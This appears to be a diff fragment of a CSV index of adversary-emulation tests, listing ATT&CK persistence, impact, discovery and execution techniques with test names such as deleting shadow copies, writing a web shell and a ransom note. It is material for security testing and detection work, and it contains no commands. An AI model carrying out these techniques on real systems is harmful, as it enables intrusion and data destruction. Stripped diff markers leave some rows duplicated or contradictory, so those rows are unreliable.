persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
@@ -838,25 +490,15 @@ discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .N
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1087.002,Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -864,26 +506,13 @@ discovery,T1069.002,Domain Groups,4,Find machines where user has local admin acc
discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Diectory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
@@ -894,23 +523,18 @@ discovery,T1087.001,Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432
discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1087.001,Local Account,11,Enumerate logged on users via PowerShell,2bdc42c7-8907-40c2-9c2b-42919a00fe03,powershell
discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,2,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,3,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,4,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,5,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
@@ -922,14 +546,8 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy -
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
@@ -940,16 +558,6 @@ discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -958,11 +566,10 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
@@ -971,44 +578,27 @@ discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1614.001,System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1016,System Network Configuration Discovery,6,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1609,Container Administration Command,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
@@ -1018,11 +608,6 @@ execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4
execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
